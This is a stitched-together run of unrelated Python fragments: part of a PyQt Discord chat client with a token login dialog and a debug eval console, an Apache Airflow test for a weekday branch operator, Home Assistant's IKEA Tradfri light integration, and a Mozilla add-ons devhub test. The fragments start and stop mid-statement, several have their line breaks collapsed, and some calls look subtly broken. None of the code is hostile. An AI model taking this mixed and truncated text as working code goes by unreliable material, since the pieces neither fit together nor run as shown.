self.memo.guild.get_member_named(user) if member.id != self.app.client.user.id: ensure_future(user.send_friend_request()) def remove_friend(self): selected = self.memoUsers.selectedItems() if selected: user = selected[0].text() member = self.memo.guild.get_member_named(user) if member.id != self.app.client.user.id: ensure_future(user.remove_friend()) class MemoTabWindow(QWidget): def __init__(self, app, parent, memo): """ A window for storing PrivateMessageWidget instances, a navigation between current private message users """ super(__class__, self).__init__() self.parent = parent self.app = app uic.loadUi(app.theme["ui_path"] + "/MemoTabWindow.ui", self) self.memo = memo # Filter channels by read permission self.channels = list(filter(lambda x: x.permissions_for(x.guild.me).read_messages, self.memo.text_channels)) # Remove two default tabs self.tabWidget.removeTab(0) self.tabWidget.removeTab(0) self.setWindowTitle("Memos") self.setWindowIcon(QIcon(self.app.theme["path"] + "/memo.png")) for channel in self.channels: self.add_memo(channel) self.add_user_items() self.show() sa.WaveObject.from_wave_file(os.path.join(self.app.theme["path"], "alarm2.wav")).play() def closeEvent(self, event): """On window (or tab) close send a PESTERCHUM:CEASE message to each user, destroy self""" del self.parent.open[self.memo] event.accept() sa.WaveObject.from_wave_file(os.path.join(self.app.theme["path"], "cease.wav")).play() def display_message(self, channel, message): self.getWidget(channel).display_text(message) def getWidget(self, guild): try: idx = self.channels.index(guild) return self.tabWidget.widget(idx) except IndexError as e: print(e) def add_memo(self, memo): ''' Add a user & PrivateMessageWidget to window, check if it is already there if so, return that user's PM, if not, create and return a PM On PrivateMessageWidget creation, send a PESTERCHUM:BEGIN initiation message ''' windw = MemoMessageWidget(self.app, self.tabWidget, self, memo) icon = 
QIcon(self.app.theme["path"] + "/memo.png") a = self.tabWidget.addTab(windw, icon, memo.name) tab = self.tabWidget.widget(a) return tab def add_user_items(self): for member in sorted(self.memo.members, key=lambda x: (max([r.position for r in x.roles if r.hoist], default=0), x.display_name), reverse=True): nam = QListWidgetItem(member.display_name) clra = member.color clr = QBrush() clr.setColor(QColor(clra.r, clra.g, clra.b)) nam.setForeground(clr) if member.top_role.permissions.administrator: nam.setIcon(QIcon(self.app.theme["path"] + "/op.png")) widget = self.tabWidget.widget(0) widget.memoUsers.addItem(nam) class AuthDialog(QDialog): def __init__(self, app, parent, f=False, i=True): """ Dialog opened when the Add [Chum] button is pressed, adds to chumsTree widget """ super(__class__, self).__init__() self.parent = parent self.app = app self.i = i self.fin = False uic.loadUi(self.app.theme["ui_path"] + "/AuthDialog.ui", self) self.setWindowTitle('Auth') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.acceptButton.clicked.connect(self.accepted) self.acceptButton.setDefault(True) self.closeButton.clicked.connect(self.rejected) if f: self.errorLabel.setText( """Invalid token! Failed to login. Make sure if you are using a bot to check the bot account check""") else: self.errorLabel.setText("""Discord no longer allows usernames/passwords! 
Check the README for how to find yours!""") self.auth = None self.exec_() def accepted(self): token = self.tokenEdit.text().strip("\"") bot = self.botCheck.isChecked() self.auth = (token, bot) if not token: return else: self.fin = True self.close() def rejected(self): if hasattr(self.app, "gui"): self.close() else: self.app.exit() def closeEvent(self, event): if self.i and not self.fin: event.accept() self.app.exit() else: event.accept() class QuirksWindow(QWidget): def __init__(self, app): super(__class__, self).__init__() self.app = app uic.loadUi(self.app.theme["ui_path"] + "/QuirksWindow.ui", self) self.addQuirkButton.clicked.connect(self.openQuirk) self.editQuirkButton.clicked.connect(self.editQuirk) self.removeQuirkButton.clicked.connect(self.removeQuirk) self.cancelButton.clicked.connect(self.closeWin) self.okButton.clicked.connect(self.save) self.testButton.clicked.connect(self.testQuirks) for type, quirk in self.app.quirks.quirks: self.quirksList.addItem("{}:{}".format(type, quirk)) self.setWindowTitle('Quirks') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.show() def openQuirk(self): AddQuirkWindow(self.app, self) def editQuirk(self): pass def removeQuirk(self): items = self.quirksList.selectedItems() for item in items: row = self.quirksList.indexFromItem(item).row() self.app.quirks.quirks.pop(row) self.quirksList.takeItem(row) def closeWin(self): self.close() def save(self): self.close() def testQuirks(self): pass class AddQuirkWindow(QWidget): def __init__(self, app, parent): super(__class__, self).__init__() self.app = app self.parent = parent uic.loadUi(self.app.theme["ui_path"] + "/AddQuirkWindow.ui", self) self.buttons = ('opts', 'prefix', 'suffix', 'replace', 'regex', 'random') self.setWindowTitle('Quirks') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) enableNext = lambda: self.nextButton.setEnabled(True) self.nextButton.setEnabled(False) self.prefixRadio.clicked.connect(enableNext) 
self.suffixRadio.clicked.connect(enableNext) self.replaceRadio.clicked.connect(enableNext) self.regexRadio.clicked.connect(enableNext) self.randomRadio.clicked.connect(enableNext) self.nextButton.clicked.connect(self.next) self.nextButton_2.clicked.connect(self.next) self.nextButton_3.clicked.connect(self.next) self.nextButton_4.clicked.connect(self.next) self.nextButton_5.clicked.connect(self.next) self.nextButton_6.clicked.connect(self.next) self.backButton.clicked.connect(self.back) self.backButton_2.clicked.connect(self.back) self.backButton_3.clicked.connect(self.back) self.backButton_4.clicked.connect(self.back) self.backButton_5.clicked.connect(self.back) self.backButton_6.clicked.connect(self.back) self.cancelButton.clicked.connect(self.close) self.cancelButton_2.clicked.connect(self.close) self.cancelButton_3.clicked.connect(self.close) self.cancelButton_4.clicked.connect(self.close) self.cancelButton_5.clicked.connect(self.close) self.cancelButton_6.clicked.connect(self.close) self.addRandomButton.clicked.connect(self.addRandom) self.removeRandomButton.clicked.connect(self.removeRandom) self.reloadFuncs.clicked.connect(self.reload_functions) self.randReloadFuncs.clicked.connect(self.rand_reload_functions) self.randomRegex = list() self.show() def back(self): self.stackWidget.setCurrentIndex(0) def next(self): index = self.stackWidget.currentIndex() if index == 0: if self.prefixRadio.isChecked(): self.stackWidget.setCurrentIndex(1) elif self.suffixRadio.isChecked(): self.stackWidget.setCurrentIndex(2) elif self.replaceRadio.isChecked(): self.stackWidget.setCurrentIndex(3) elif self.regexRadio.isChecked(): self.stackWidget.setCurrentIndex(4) self.addFuncs() elif self.randomRadio.isChecked(): self.stackWidget.setCurrentIndex(5) self.randAddFuncs() elif index == 1: value = self.prefixLineEdit.text() self.app.quirks.append(("prefix", value,)) elif index == 2: value = self.suffixLineEdit.text() self.app.quirks.append(("suffix", value,)) elif index == 3: value = 
(self.replaceReplaceLineEdit.text(), self.replaceWithLineEdit.text()) self.app.quirks.append(("replace", value,)) elif index == 4: replace = self.regexpReplaceLineEdit.text() fm = self.regexpLineEdit.text() if not ("(" in fm and ")" in fm): fm = "({})".format(fm) value = (fm, replace) self.app.quirks.append(("regex", value,)) elif index == 5: fm = self.randomRegexpLineEdit.text() if not ("(" in fm and ")" in fm): fm = "({})".format(fm) value = (fm, tuple(self.randomRegex)) self.app.quirks.append(("random", value,)) if index != 0: self.parent.quirksList.addItem("{}:{}".format(self.buttons[index], value)) self.close() def addRandom(self): nq = self.addRandomLineEdit.text() self.randomList.addItem(nq) self.randomRegex.append(nq) self.addRandomLineEdit.setText("") def removeRandom(self): items = self.randomList.selectedItems() for item in items: self.randomRegex.remove(item.text()) self.randomList.takeItem(self.randomList.indexFromItem(item).row()) def randAddFuncs(self): for func in self.app.quirks.qfuncs.values(): self.randRegexFuncs.addItem(func.__name__ + "()") def addFuncs(self): for func in self.app.quirks.qfuncs.values(): self.regexFuncs.addItem(func.__name__ + "()") def reload_functions(self): self.regexFuncs.reset() self.app.quirks.reload() self.addFuncs() def rand_reload_functions(self): self.randRegexFuncs.reset() self.app.quirks.reload() self.addFuncs() class ConnectingDialog(QDialog): def __init__(self, app, parent): super(__class__, self).__init__() uic.loadUi(app.theme["ui_path"] + "/ConnectingDialog.ui", self) self.app = app self.parent = parent self.app.connectingDialog = self self.setWindowFlags(Qt.FramelessWindowHint) self.connectingExitButton.clicked.connect(sysexit) self.setWindowTitle('Connecting') self.setWindowIcon(QIcon(app.theme["path"] + "/trayicon.png")) self.app.connectingDialog = self width = self.frameGeometry().width() height = self.frameGeometry().height() self.setFixedSize(width, height) # Methods for moving window @pyqtSlot() def 
mousePressEvent(self, event): self.offset = event.pos() @pyqtSlot() def mouseMoveEvent(self, event): x = event.globalX() y = event.globalY() x_w = self.offset.x() y_w = self.offset.y() self.move(x - x_w, y - y_w) class InteractiveConsole(QWidget): def __init__(self, app): super(__class__, self).__init__() uic.loadUi(app.theme["ui_path"] + "/PrivateMessageWidget.ui", self) self.app = app self.userLabel.setText("::DEBUG::") self.setWindowTitle("Debug") self.setWindowIcon(QIcon("resources/sburb.png")) self.sendButton.clicked.connect(self.send) self.sendButton.setText("GO!") self.userOutput.setReadOnly(True) self.userOutput.setMouseTracking(True) self.show() def send(self): msg = self.userInput.text() if msg: self.display_text(">>> {}\n".format(msg)) ensure_future(self.run(msg)) self.userInput.setText("") def display_text(self, msg): if not msg.endswith("\n"): msg += "\n" cursor = self.userOutput.textCursor() cursor.movePosition(QTextCursor.End) self.userOutput.setTextCursor(cursor) self.userOutput.insertPlainText(msg) def keyPressEvent(self, event): if event.key() == Qt.Key_Return: self.send() def get_syntax_error(self, e): return '{0.text}{1:>{0.offset}}\n{2}: {0}'.format(e, '^', type(e).__name__) async def run(self, msg): msg = msg.replace("\\n", "\n") app = self.app client = self.app.client gui = self.app.gui executor = exec if msg.count('\n') == 0: # single statement, potentially 'eval' try: code = compile(msg, '<repl>', 'eval') except SyntaxError: pass else: executor = eval if executor is exec: try: code = compile(msg, '<repl>', 'exec') except SyntaxError as e: self.display_text(self.get_syntax_error(e)) return fmt = None stdout = StringIO() try: with redirect_stdout(stdout): result = executor(code) if isawaitable(result): result = await result except Exception as e: value = stdout.getvalue() fmt = '{}{}'.format(value, format_exc()) else: value = stdout.getvalue() if result is not None: fmt = '{}{}'.format(value, result) elif value: fmt = '{}'.format(value) if 
fmt is not None: if len(fmt) > 2000: self.display_text('Content too big to be printed.') else: self.display_text(fmt)
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.

import datetime
import unittest

import pytest
from freezegun import freeze_time
from parameterized import parameterized

from airflow.exceptions import AirflowException
from airflow.models import DAG, DagRun, TaskInstance as TI
from airflow.operators.dummy import DummyOperator
from airflow.operators.weekday import BranchDayOfWeekOperator
from airflow.utils import timezone
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.weekday import WeekDay

DEFAULT_DATE = timezone.datetime(2020, 2, 5)  # Wednesday
INTERVAL = datetime.timedelta(hours=12)


class TestBranchDayOfWeekOperator(unittest.TestCase):
    """
    Tests for BranchDayOfWeekOperator
    """

    @classmethod
    def setUpClass(cls):
        # Start from a clean slate: leftover runs/instances from other
        # test modules would break the per-state assertions below.
        with create_session() as session:
            session.query(DagRun).delete()
            session.query(TI).delete()

    def setUp(self):
        """Build a fresh DAG with two downstream branches for each test."""
        self.dag = DAG(
            "branch_day_of_week_operator_test",
            start_date=DEFAULT_DATE,
            schedule_interval=INTERVAL,
        )
        self.branch_1 = DummyOperator(task_id="branch_1", dag=self.dag)
        self.branch_2 = DummyOperator(task_id="branch_2", dag=self.dag)
        # Only created by tests that need a third branch.
        self.branch_3 = None

    def tearDown(self):
        with create_session() as session:
            session.query(DagRun).delete()
            session.query(TI).delete()

    def _assert_task_ids_match_states(self, dr, task_ids_to_states):
        """Helper that asserts task instances with a given id are in a given state"""
        tis = dr.get_task_instances()
        for ti in tis:
            try:
                expected_state = task_ids_to_states[ti.task_id]
            except KeyError:
                raise ValueError(f'Invalid task id {ti.task_id} found!')
            else:
                self.assertEqual(
                    ti.state,
                    expected_state,
                    f"Task {ti.task_id} has state {ti.state} instead of expected {expected_state}",
                )

    @parameterized.expand(
        [
            ("with-string", "Monday"),
            ("with-enum", WeekDay.MONDAY),
            ("with-enum-set", {WeekDay.MONDAY}),
            ("with-enum-set-2-items", {WeekDay.MONDAY, WeekDay.FRIDAY}),
            ("with-string-set", {"Monday"}),
            ("with-string-set-2-items", {"Monday", "Friday"}),
        ]
    )
    @freeze_time("2021-01-25")  # Monday
    def test_branch_follow_true(self, _, weekday):
        """Checks if BranchDayOfWeekOperator follows true branch"""
        branch_op = BranchDayOfWeekOperator(
            task_id="make_choice",
            follow_task_ids_if_true=["branch_1", "branch_2"],
            follow_task_ids_if_false="branch_3",
            week_day=weekday,
            dag=self.dag,
        )
        self.branch_1.set_upstream(branch_op)
        self.branch_2.set_upstream(branch_op)
        self.branch_3 = DummyOperator(task_id="branch_3", dag=self.dag)
        self.branch_3.set_upstream(branch_op)
        self.dag.clear()

        dr = self.dag.create_dagrun(
            run_id="manual__",
            start_date=timezone.utcnow(),
            execution_date=DEFAULT_DATE,
            state=State.RUNNING,
        )

        branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)

        self._assert_task_ids_match_states(
            dr,
            {
                'make_choice': State.SUCCESS,
                'branch_1': State.NONE,
                'branch_2': State.NONE,
                'branch_3': State.SKIPPED,
            },
        )

    @freeze_time("2021-01-25")  # Monday
    def test_branch_follow_true_with_execution_date(self):
        """Checks if BranchDayOfWeekOperator follows true branch when set use_task_execution_day"""

        branch_op = BranchDayOfWeekOperator(
            task_id="make_choice",
            follow_task_ids_if_true="branch_1",
            follow_task_ids_if_false="branch_2",
            week_day="Wednesday",
            use_task_execution_day=True,  # We compare to DEFAULT_DATE which is Wednesday
            dag=self.dag,
        )
        self.branch_1.set_upstream(branch_op)
        self.branch_2.set_upstream(branch_op)
        self.dag.clear()

        dr = self.dag.create_dagrun(
            run_id="manual__",
            start_date=timezone.utcnow(),
            execution_date=DEFAULT_DATE,
            state=State.RUNNING,
        )

        branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)

        self._assert_task_ids_match_states(
            dr,
            {
                'make_choice': State.SUCCESS,
                'branch_1': State.NONE,
                'branch_2': State.SKIPPED,
            },
        )

    @freeze_time("2021-01-25")  # Monday
    def test_branch_follow_false(self):
        """Checks if BranchDayOfWeekOperator follow false branch"""

        branch_op = BranchDayOfWeekOperator(
            task_id="make_choice",
            follow_task_ids_if_true="branch_1",
            follow_task_ids_if_false="branch_2",
            week_day="Sunday",
            dag=self.dag,
        )
        self.branch_1.set_upstream(branch_op)
        self.branch_2.set_upstream(branch_op)
        self.dag.clear()

        dr = self.dag.create_dagrun(
            run_id="manual__",
            start_date=timezone.utcnow(),
            execution_date=DEFAULT_DATE,
            state=State.RUNNING,
        )

        branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)

        self._assert_task_ids_match_states(
            dr,
            {
                'make_choice': State.SUCCESS,
                'branch_1': State.SKIPPED,
                'branch_2': State.NONE,
            },
        )

    def test_branch_with_no_weekday(self):
        """Check if BranchDayOfWeekOperator raises exception on missing weekday"""
        with self.assertRaises(AirflowException):
            BranchDayOfWeekOperator(  # pylint: disable=missing-kwoa
                task_id="make_choice",
                follow_task_ids_if_true="branch_1",
                follow_task_ids_if_false="branch_2",
                dag=self.dag,
            )

    def test_branch_with_invalid_type(self):
        """Check if BranchDayOfWeekOperator raises exception on unsupported weekday type"""
        invalid_week_day = ['Monday']
        with pytest.raises(
            TypeError,
            match='Unsupported Type for week_day parameter:'
            ' {}. It should be one of str, set or '
            'Weekday enum type'.format(type(invalid_week_day)),
        ):
            BranchDayOfWeekOperator(
                task_id="make_choice",
                follow_task_ids_if_true="branch_1",
                follow_task_ids_if_false="branch_2",
                week_day=invalid_week_day,
                dag=self.dag,
            )

    def test_weekday_branch_invalid_weekday_number(self):
        """Check if BranchDayOfWeekOperator raises exception on wrong value of weekday"""
        invalid_week_day = 'Thsday'
        with pytest.raises(AttributeError, match=f'Invalid Week Day passed: "{invalid_week_day}"'):
            BranchDayOfWeekOperator(
                task_id="make_choice",
                follow_task_ids_if_true="branch_1",
                follow_task_ids_if_false="branch_2",
                week_day=invalid_week_day,
                dag=self.dag,
            )

    @freeze_time("2021-01-25")  # Monday
    def test_branch_xcom_push_true_branch(self):
        """Check if BranchDayOfWeekOperator push to xcom value of follow_task_ids_if_true"""
        branch_op = BranchDayOfWeekOperator(
            task_id="make_choice",
            follow_task_ids_if_true="branch_1",
            follow_task_ids_if_false="branch_2",
            week_day="Monday",
            dag=self.dag,
        )
        self.branch_1.set_upstream(branch_op)
        self.branch_2.set_upstream(branch_op)
        self.dag.clear()

        dr = self.dag.create_dagrun(
            run_id="manual__",
            start_date=timezone.utcnow(),
            execution_date=DEFAULT_DATE,
            state=State.RUNNING,
        )

        branch_op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)

        tis = dr.get_task_instances()
        for ti in tis:
            if ti.task_id == 'make_choice':
                assert ti.xcom_pull(task_ids='make_choice') == 'branch_1'
"""Support for IKEA Tradfri lights.""" from __future__ import annotations from collections.abc import Callable from typing import Any, cast from pytradfri.command import Command from pytradfri.group import Group from homeassistant.components.light import ( ATTR_BRIGHTNESS, ATTR_COLOR_TEMP, ATTR_HS_COLOR, ATTR_TRANSITION, SUPPORT_BRIGHTNESS, SUPPORT_COLOR, SUPPORT_COLOR_TEMP, LightEntity, ) from homeassistant.config_entries import ConfigEntry from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.update_coordinator import CoordinatorEntity import homeassistant.util.color as color_util from .base_class import TradfriBaseEntity from .const import ( ATTR_DIMMER, ATTR_HUE, ATTR_SAT, ATTR_TRANSITION_TIME, CONF_GATEWAY_ID, CONF_IMPORT_GROUPS, COORDINATOR, COORDINATOR_LIST, DOMAIN, GROUPS_LIST, KEY_API, SUPPORTED_GROUP_FEATURES, SUPPORTED_LIGHT_FEATURES, ) from .coordinator import ( TradfriDeviceDataUpdateCoordinator, TradfriGroupDataUpdateCoordinator, ) async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback, ) -> None: """Load Tradfri lights based on a config entry.""" gateway_id = config_entry.data[CONF_GATEWAY_ID] coordinator_data = hass.data[DOMAIN][config_entry.entry_id][COORDINATOR] api = coordinator_data[KEY_API] entities: list = [ TradfriLight( device_coordinator, api, gateway_id, ) for device_coordinator in coordinator_data[COORDINATOR_LIST] if device_coordinator.device.has_light_control ] if config_entry.data[CONF_IMPORT_GROUPS] and ( group_coordinators := coordinator_data[GROUPS_LIST] ): entities.extend( [ TradfriGroup(group_coordinator, api, gateway_id) for group_coordinator in group_coordinators ] ) async_add_entities(entities) class TradfriGroup(CoordinatorEntity, LightEntity): """The platform class for light groups required by hass.""" _attr_supported_features = SUPPORTED_GROUP_FEATURES def __init__( self, 
group_coordinator: TradfriGroupDataUpdateCoordinator, api: Callable[[Command | list[Command]], Any], gateway_id: str, ) -> None: """Initialize a Group.""" super().__init__(coordinator=group_coordinator) self._group: Group = self.coordinator.data self._api = api self._attr_unique_id = f"group-{gateway_id}-{self._group.id}" @property def is_on(self) -> bool: """Return true if group lights are on.""" return cast(bool, self._group.state) @property def brightness(self) -> int | None: """Return the brightness of the group lights.""" return cast(int, self._group.dimmer) async def async_turn_off(self, **kwargs: Any) -> None: """Instruct the group lights to turn off.""" await self._api(self._group.set_state(0)) await self.coordinator.async_request_refresh() async def async_turn_on(self, **kwargs: Any) -> None: """Instruct the group lights to turn on, or dim.""" keys = {} if ATTR_TRANSITION in kwargs: keys["transition_time"] = int(kwargs[ATTR_TRANSITION]) * 10 if ATTR_BRIGHTNESS in kwargs: if kwargs[ATTR_BRIGHTNESS] == 255: kwargs[ATTR_BRIGHTNESS] = 254 await self._api(self._group.set_dimmer(kwargs[ATTR_BRIGHTNESS], **keys)) else: await self._api(self._group.set_state(1)) await self.coordinator.async_request_refresh() class TradfriLight(TradfriBaseEntity, LightEntity): """The platform class required by Home Assistant.""" def __init__( self, device_coordinator: TradfriDeviceDataUpdateCoordinator, api: Callable[[Command | list[Command]], Any], gateway_id: str, ) -> None: """Initialize a Light.""" super().__init__( device_coordinator=device_coordinator, api=api, gateway_id=gateway_id, ) self._device_control = self._device.light_control self._device_data = self._device_control.lights[0] self._attr_unique_id = f"light-{gateway_id}-{self._device_id}" self._hs_color = None # Calculate supported features _features = SUPPORTED_LIGHT_FEATURES if self._device.light_control.can_set_dimmer: _features |= SUPPORT_BRIGHTNESS if self._device.light_control.can_set_color: _features |= 
SUPPORT_COLOR | SUPPORT_COLOR_TEMP if self._device.light_control.can_set_temp: _features |= SUPPORT_COLOR_TEMP self._attr_supported_features = _features if self._device_control: self._attr_min_mireds = self._device_control.min_mireds self._attr_max_mireds = self._device_control.max_mireds def _refresh(self) -> None: """Refresh the device.""" self._device_data = self.coordinator.data.light_control.lights[0] @property def is_on(self) -> bool: """Return true if light is on.""" if not self._device_data: return False return cast(bool, self._device_data.state) @property def brightness(self) -> int | None: """Return the brightness of the light.""" if not self._device_data: return None return cast(int, self._device_data.dimmer) @property def color_temp(self) -> int | None: """Return the color temp value in mireds.""" if not self._device_data: return None return cast(int, self._device_data.color_temp) @property def hs_color(self) -> tuple[float, float] | None: """HS color of the light.""" if not self._device_control or not self._device_data: return None if self._device_control.can_set_color: hsbxy = self._device_data.hsb_xy_color hue = hsbxy[0] / (self._device_control.max_hue / 360) sat = hsbxy[1] / (self._device_control.max_saturation / 100) if hue is not None and sat is not None: return hue, sat return None async def async_turn_off(self, **kwargs: Any) -> None: """Instruct the light to turn off.""" # This allows transitioning to off, but resets the brightness # to 1 for the next set_state(True) command if not self._device_control: return transition_time = None if ATTR_TRANSITION in kwargs: transition_time = int(kwargs[ATTR_TRANSITION]) * 10 dimmer_data = {ATTR_DIMMER: 0, ATTR_TRANSITION_TIME: transition_time} await self._api(self._device_control.set_dimmer(**dimmer_data)) else: await self._api(self._device_control.set_state(False)) async def async_turn_on(self, **kwargs: Any) -> None: """Instruct the light to turn on.""" if not self._device_control: return transition_time 
= None if ATTR_TRANSITION in kwargs: transition_time = int(kwargs[ATTR_TRANSITION]) * 10 dimmer_command = None if ATTR_BRIGHTNESS in kwargs: brightness = kwargs[ATTR_BRIGHTNESS] brightness = min(brightness, 254) dimmer_data = { ATTR_DIMMER: brightness, ATTR_TRANSITION_TIME: transition_time, } dimmer_command = self._device_control.set_dimmer(**dimmer_data) transition_time = None else: dimmer_command = self._device_control.set_state(True) color_command = None if ATTR_HS_COLOR in kwargs and self._device_control.can_set_color: hue = int(kwargs[ATTR_HS_COLOR][0] * (self._device_control.max_hue / 360)) sat = int( kwargs[ATTR_HS_COLOR][1] * (self._device_control.max_saturation / 100) ) color_data = { ATTR_HUE: hue, ATTR_SAT: sat, ATTR_TRANSITION_TIME: transition_time, } color_command = self._device_control.set_hsb(**color_data) transition_time = None temp_command = None if ATTR_COLOR_TEMP in kwargs and ( self._device_control.can_set_temp or self._device_control.can_set_color ): temp = kwargs[ATTR_COLOR_TEMP] # White Spectrum bulb if self._device_control.can_set_temp: if temp > self.max_mireds: temp = self.max_mireds elif temp < self.min_mireds: temp = self.min_mireds temp_data = { ATTR_COLOR_TEMP: temp, ATTR_TRANSITION_TIME: transition_time, } temp_command = self._device_control.set_color_temp(**temp_data) transition_time = None # Color bulb (CWS) # color_temp needs to be set with hue/saturation elif self._device_control.can_set_color: temp_k = color_util.color_temperature_mired_to_kelvin(temp) hs_color = color_util.color_temperature_to_hs(temp_k) hue = int(hs_color[0] * (self._device_control.max_hue / 360)) sat = int(hs_color[1] * (self._device_control.max_saturation / 100)) color_data = { ATTR_HUE: hue, ATTR_SAT: sat, ATTR_TRANSITION_TIME: transition_time, } color_command = self._device_control.set_hsb(**color_data) transition_time = None # HSB can always be set, but color temp + brightness is bulb dependent if (command := dimmer_command) is not None: command += 
color_command else: command = color_command if self._device_control.can_combine_commands: await self._api(command + temp_command) else: if temp_command is not None: await self._api(temp_command) if command is not None: await self._api(command)
"""Tests related to the ``devhub.addons.owner`` view.""" from nose.tools import eq_ from pyquery import PyQuery as pq import waffle import amo import amo.tests from amo.tests import formset from addons.models import Addon, AddonUser from devhub.forms import LicenseForm from devhub.models import ActivityLog from versions.models import License, Version class TestOwnership(amo.tests.TestCase): fixtures = ['base/apps', 'base/users', 'base/addon_3615'] def setUp(self): self.addon = Addon.objects.get(id=3615) self.version = self.addon.current_version self.url = self.addon.get_dev_url('owner') assert self.client.login(username='del@icio.us', password='password') def formset(self, *args, **kw): defaults = {'builtin': License.OTHER, 'text': 'filler'} defaults.update(kw) return formset(*args, **defaults) def get_version(self): return Version.objects.no_cache().get(id=self.version.id) def get_addon(self): return Addon.objects.no_cache().get(id=self.addon.id) class TestEditPolicy(TestOwnership): def formset(self, *args, **kw): init = self.client.get(self.url).context['user_form'].initial_forms args = args + tuple(f.initial for f in init) return super(TestEditPolicy, self).formset(*args, **kw) def test_edit_eula(self): old_eula = self.addon.eula data = self.formset(eula='new eula', has_eula=True) r = self.client.post(self.url, data) eq_(r.status_code, 302) addon = self.get_addon() eq_(unicode(addon.eula), 'new eula') eq_(addon.eula.id, old_eula.id) def test_delete_eula(self): assert self.addon.eula r = self.client.post(self.url, self.formset(has_eula=False)) eq_(r.status_code, 302) eq_(self.get_addon().eula, None) def test_edit_eula_locale(self): self.addon.eula = {'de': 'some eula', 'en-US': ''} self.addon.save() res = self.client.get(self.url.replace('en-US', 'it')) doc = pq(res.content) eq_(doc('#id_has_eula').attr('checked'), 'checked') class TestEditLicense(TestOwnership): def setUp(self): super(TestEditLicense, self).setUp() self.version.license = None self.version.save() 
self.license = License.objects.create(builtin=1, name='bsd', url='license.url', on_form=True) def formset(self, *args, **kw): init = self.client.get(self.url).context['user_form'].initial_forms args = args + tuple(f.initial for f in init) kw['initial_count'] = len(init) data = super(TestEditLicense, self).formset(*args, **kw) if 'text' not in kw: del data['text'] return data def test_success_add_builtin(self): data = self.formset(builtin=1) r = self.client.post(self.url, data) eq_(r.status_code, 302) eq_(self.license, self.get_version().license) eq_(ActivityLog.objects.filter( action=amo.LOG.CHANGE_LICENSE.id).count(), 1) def test_success_add_custom(self): data = self.formset(builtin=License.OTHER, text='text', name='name') r = self.client.post(self.url, data) eq_(r.status_code, 302) license = self.get_version().license eq_(unicode(license.text), 'text') eq_(unicode(license.name), 'name') eq_(license.builtin, License.OTHER) def test_success_edit_custom(self): data = self.formset(builtin=License.OTHER, text='text', name='name') r = self.client.post(self.url, data) license_one = self.get_version().license data = self.formset(builtin=License.OTHER, text='woo', name='name') r = self.client.post(self.url, data) eq_(r.status_code, 302) license_two = self.get_version().license eq_(unicode(license_two.text), 'woo') eq_(unicode(license_two.name), 'name') eq_(license_two.builtin, License.OTHER) eq_(license_two.id, license_one.id) def test_success_switch_license(self): data = self.formset(builtin=1) r = self.client.post(self.url, data) license_one = self.get_version().license data = self.formset(builtin=License.OTHER, text='text', name='name') r = self.client.post(self.url, data) eq_(r.status_code, 302) license_two = self.get_version().license eq_(unicode(license_two.text), 'text') eq_(unicode(license_two.name), 'name') eq_(license_two.builtin, License.OTHER) assert license_one != license_two # Make sure the old license wasn't edited. 
license = License.objects.get(builtin=1) eq_(unicode(license.name), 'bsd') data = self.formset(builtin=1) r = self.client.post(self.url, data) eq_(r.status_code, 302) license_three = self.get_version().license eq_(license_three, license_one) def test_custom_has_text(self): data = self.formset(builtin=License.OTHER, name='name') r = self.client.post(self.url, data) eq_(r.status_code, 200) self.assertFormError(r, 'license_form', None, 'License text is required when choosing Other.') def test_custom_has_name(self): data = self.formset(builtin=License.OTHER, text='text') r = self.client.post(self.url, data) eq_(r.status_code, 302) license = self.get_version().license eq_(unicode(license.text), 'text') eq_(unicode(license.name), 'Custom License') eq_(license.builtin, License.OTHER) def test_no_version(self): # Make sure nothing bad happens if there's no version. self.addon.update(_current_version=None) Version.objects.all().delete() data = self.formset(builtin=License.OTHER, text='text') r = self.client.post(self.url, data) eq_(r.status_code, 302) def test_license_details_links(self): # Check that builtin licenses get details links. 
doc = pq(unicode(LicenseForm(addon=self.version.addon))) for license in License.objects.builtins(): radio = 'input.license[value=%s]' % license.builtin eq_(doc(radio).parent().text(), unicode(license.name) + ' Details') eq_(doc(radio + '+ a').attr('href'), license.url) eq_(doc('input[name=builtin]:last-child').parent().text(), 'Other') def test_license_logs(self): data = self.formset(builtin=License.OTHER, text='text') self.version.files.all().delete() self.version.addon.update(status=amo.STATUS_PUBLIC) self.client.post(self.url, data) eq_(ActivityLog.objects.all().count(), 2) self.version.license = License.objects.all()[1] self.version.save() data = self.formset(builtin=License.OTHER, text='text') self.client.post(self.url, data) eq_(ActivityLog.objects.all().count(), 3) class TestEditAuthor(TestOwnership): def test_reorder_authors(self): """ Re-ordering authors should not generate role changes in the ActivityLog. """ # flip form-0-position f = self.client.get(self.url).context['user_form'].initial_forms[0] u = dict(user='regular@mozilla.com', listed=True, role=amo.AUTHOR_ROLE_DEV, position=0) data = self.formset(f.initial, u, initial_count=1) r = self.client.post(self.url, data) eq_(r.status_code, 302) f = self.client.get(self.url).context['user_form'].initial_forms[0] u1 = f.initial u1['position'] = 1 f = self.client.get(self.url).context['user_form'].initial_forms[1] u2 = f.initial data = self.formset(u1, u2) orig = ActivityLog.objects.all().count() r = self.client.post(self.url, data) self.assertRedirects(r, self.url, 302) eq_(ActivityLog.objects.all().count(), orig) def test_success_add_user(self): q = (AddonUser.objects.no_cache().filter(addon=3615) .values_list('user', flat=True)) eq_(list(q.all()), [55021]) f = self.client.get(self.url).context['user_form'].initial_forms[0] u = dict(user='regular@mozilla.com', 